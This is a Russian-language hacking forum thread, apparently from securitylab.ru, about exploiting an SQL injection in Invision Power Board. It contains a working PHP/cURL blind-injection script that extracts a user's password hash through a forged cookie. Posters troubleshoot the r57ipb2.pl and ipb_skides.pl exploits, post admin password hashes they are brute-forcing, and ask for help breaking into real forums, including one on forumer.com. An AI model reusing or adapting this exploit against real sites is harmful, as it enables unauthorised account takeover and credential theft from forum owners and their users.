Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 След.
RSS
SQL-инъекция в Invision Power Board
 
Vano
в версиях  lt;2 (в 1.3.1 в частности), выдается именно пароль, а не мемберID. Вот его и предстоит расшифровывать.
 
Люди я чесно говоря вообще не чего не понял (кроме того что на http://skidеs.net.ru/exploits/ipb_skides.txt лежит рабочий)
подскажите как применять это!
 
Ну, получил я хэш, терь кто мне популярно объяснит - чё с ним делать??
 
Всё, понял, всем спасибо, сплойт работает.
 
Вот вариация этого эксплоита на php, переписан за пару минут. И работает медленно и через CURL.
<?
set_time_limit(999999);
$zap="http://staff/forum/index.php?act=Login&CODE=autologin" ;
$user=3;
$sh=array("0","1","2","3","4","5","6","7","8","9","a","b","c ","d","e","f");
$hash=;
for( $i=1; $i <33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql="99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$ current%2527)/*";
#$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1) %3d%2527$current%2527)/*";
$cook="pass_hash=$sql;member_id=$user";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec ($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
} else {
$hash.=$sh[$j];
}
}
}
echo $hash;
?>
 
Привет народ!
Жалко что отдельные типы.... не будем указывать какие :)
не могут толком рассказать как и что мы "чайники" делаем не правильно! Короче говоря, весь день сегодня потратил, на аналогичных форумах почти то же самое. Могу поделиться тем что нарыл! Если у вас эксплоит r57ipb2.pl
меняем 90 строку на $allchar .= chr($char) в оригенале (42), были в нэте предложения поменять на ($i), все равно были звездочки:)
Если вы пользуетесь эксплоитом ipb_skides.pl Что и где менять пока не знаю (perl начал изучать самоучителем неделю назад:) ), сам разобраться пока не могу, а  инфы пока не нарыл:( Хочу вот сказать еще что: в тех форумы в которых r57ipb2.pl добывает хеш, такой же результат и с использованием ipb_skides.pl, хеш один и тот же, а где r57ipb2.pl пишет херню, там и ipb_skides.pl выдает нули!
Хотелось добавить вот что еще:  ipb_skides.pl брал не с "securitylab", где то попалась ссылочка на...(не спрашивайте не вспомню, могу только скинуть исходник, который имею в данный момент:) )
С удовольствием бы дал вам форум, для практики, но поймите правильно народ, найдутся тут люди которые сразу настучат им что дырочку надо бы прикрыть:) Ну, а так как я из числа начинающих мне нужны сравнения:)Хеш могу выложить, мои словарики не помогли, щас идет полный перебор. А это сами знаете...... как долго... .
id 1: 7392E5A07CC56647B45A9598CE4D646D
id 2: BDC1E0F2CABDE0C003007F2B5702495E
Если есть хорошие словарики поделись:)
Вот что еще хотелось бы спрсить: www.securitylab.ru/forum/
Все понятно:) А если: www.forum.securitylab.ru :)))
Как эксплоит кормится?:)))
Спасибо всем!!! Надеюсь еще увидимся!!! :)))
 
guest 5
Во первых форумов дофига и больше с этой уязвимостью, так что для практики при желании можно найти форум легко. Во вторых нафиг тебе расшифровывать, не легче подделать кукисы?
 
все канешна харашо..
но как быть, если форум лежит в корне сайта..
например forum.бла бла бла.ru ?!
у мя нифига не пашет в такой ситуации..
 
FlashAck\
Привет тебе, и всем!
Что касается что форумов с этой уязвимостью дофига..., согласен, но все таки их с каждым днем становится, и будет становиться все меньше и меньше. А мне терять время на поиски, бросая практику не очень хочется! Я и так не успеваю за такими темпами развития хака и антихака:)Жаль в то время, когда стоял выбор куда пойти учиться, в нашей стране это все только начиналось. По этому, глядя в светлое будующее:) пришлось пойти учиться и работать в другую сферу, в которой добился высоких результатов:) А человек, как известно стремится к обучению и развитию. Вот и мня потянуло на неизведанное. Так как в своей сфере достиг предела, стало просто не интересно, на работе помогаю таким же "чайникам", каким вы видете меня здесь, ну, а мозг требует совершенства и стремится к познанию того чего не знает!!!:) Теории в голове полно, (столько всего перечитал:), ну, а вот с практикой..........., хорошо что щас хоть видео взломов появилос:) жалко только что с опозданием выходит:( когда дыру уже почти закрывают!
Что то я разговорился:) не совсем по теме:), извените админы, модеры, просто крик души:)
Теперь по поводу второй части твоего овета. Возможно куки и легче подделать........., а смысл?...... Вскрыть админку гораздо интересней, а дефолте не говорю, считаю что это глупо! Если в чем то ошибаюсь, поправляй:)
Для меня это просто спортивный интерес, как разгадка кросворда:)Когда ты его разгадываешь, ты получаешь определенное наслаждение.:) А больше мне и нечего не надо!!! :))) Если я тебя заинтересовал чисто как человек, с удовольствием бы продолжил наше общение в аське, но не могу себе позволить зарегиться под 9 значным номером:)Угоню 6-7 значную, вот тогда и поговорим приватно:)
Всем привет!!!
 
Цитата
flippeR пишет:
все канешна харашо..
но как быть, если форум лежит в корне сайта..
например forum.бла бла бла.ru ?!
у мя нифига не пашет в такой ситуации..

А здесь все просто:
forum.бла бла бла.ru / [id] [ver]
 
дак как использовать ipb_skides??
выводит то failed то non exploitable!
ну или как пхп эксплойт который тут дали использовать??
 
Народ я новичок,и хочу в Взломат форум на forumer.com, мне надо узнат пароль главного админа (логин я знаю).подскажите плз как, а то из того что было написано наверху ничего не понял..за ра [IMG]http://www.securitylab.ru/forum/smileys/smiley17.gif[/IMG] неее спасибо
 
новичок Привет !!!
Здается мне что ошибся топиком:)Иди изучай инфу по вот этому движку: vBulletin Version 3.0.6
 
А как использовать сплойт. У меня команда perl не действует. Что надо сделать, чтобы она действовала?
 
Мучаюсь тем же вопросом.
И не использовать мой ник!
 
Staff
в 7-ой строке ошибка..
 
JIoJI
 
Цитата
guest 5 пишет:
Привет народ!
Жалко что отдельные типы.... не будем указывать какие :)
не могут толком рассказать как и что мы "чайники" делаем не правильно! Короче говоря, весь день сегодня потратил, на аналогичных форумах почти то же самое. Могу поделиться тем что нарыл! Если у вас эксплоит r57ipb2.pl
меняем 90 строку на $allchar .= chr($char) в оригенале (42), были в нэте предложения поменять на ($i), все равно были звездочки:)
Если вы пользуетесь эксплоитом ipb_skides.pl Что и где менять пока не знаю (perl начал изучать самоучителем неделю назад:) ), сам разобраться пока не могу, а  инфы пока не нарыл:( Хочу вот сказать еще что: в тех форумы в которых r57ipb2.pl добывает хеш, такой же результат и с использованием ipb_skides.pl, хеш один и тот же, а где r57ipb2.pl пишет херню, там и ipb_skides.pl выдает нули!
Хотелось добавить вот что еще:  ipb_skides.pl брал не с "securitylab", где то попалась ссылочка на...(не спрашивайте не вспомню, могу только скинуть исходник, который имею в данный момент:) )
С удовольствием бы дал вам форум, для практики, но поймите правильно народ, найдутся тут люди которые сразу настучат им что дырочку надо бы прикрыть:) Ну, а так как я из числа начинающих мне нужны сравнения:)Хеш могу выложить, мои словарики не помогли, щас идет полный перебор. А это сами знаете...... как долго... .
id 1: 7392E5A07CC56647B45A9598CE4D646D
id 2: BDC1E0F2CABDE0C003007F2B5702495E
Если есть хорошие словарики поделись:)
Вот что еще хотелось бы спрсить: www.securitylab.ru/forum/
Все понятно:) А если: www.forum.securitylab.ru :)))
Как эксплоит кормится?:)))
Спасибо всем!!! Надеюсь еще увидимся!!! :)))
 
Цитата
guest 5 пишет:
Привет народ!
Жалко что отдельные типы.... не будем указывать какие :)
не могут толком рассказать как и что мы "чайники" делаем не правильно! Короче говоря, весь день сегодня потратил, на аналогичных форумах почти то же самое. Могу поделиться тем что нарыл! Если у вас эксплоит r57ipb2.pl
меняем 90 строку на $allchar .= chr($char) в оригенале (42), были в нэте предложения поменять на ($i), все равно были звездочки:)
Если вы пользуетесь эксплоитом ipb_skides.pl Что и где менять пока не знаю (perl начал изучать самоучителем неделю назад:) ), сам разобраться пока не могу, а  инфы пока не нарыл:( Хочу вот сказать еще что: в тех форумы в которых r57ipb2.pl добывает хеш, такой же результат и с использованием ipb_skides.pl, хеш один и тот же, а где r57ipb2.pl пишет херню, там и ipb_skides.pl выдает нули!
Хотелось добавить вот что еще:  ipb_skides.pl брал не с "securitylab", где то попалась ссылочка на...(не спрашивайте не вспомню, могу только скинуть исходник, который имею в данный момент:) )
С удовольствием бы дал вам форум, для практики, но поймите правильно народ, найдутся тут люди которые сразу настучат им что дырочку надо бы прикрыть:) Ну, а так как я из числа начинающих мне нужны сравнения:)Хеш могу выложить, мои словарики не помогли, щас идет полный перебор. А это сами знаете...... как долго... .
id 1: 7392E5A07CC56647B45A9598CE4D646D
id 2: BDC1E0F2CABDE0C003007F2B5702495E
Если есть хорошие словарики поделись:)
Вот что еще хотелось бы спрсить: www.securitylab.ru/forum/
Все понятно:) А если: www.forum.securitylab.ru :)))
Как эксплоит кормится?:)))
Спасибо всем!!! Надеюсь еще увидимся!!! :)))
 
zz  zz
Страницы: Пред. 1 2 3 4 След.
Читают тему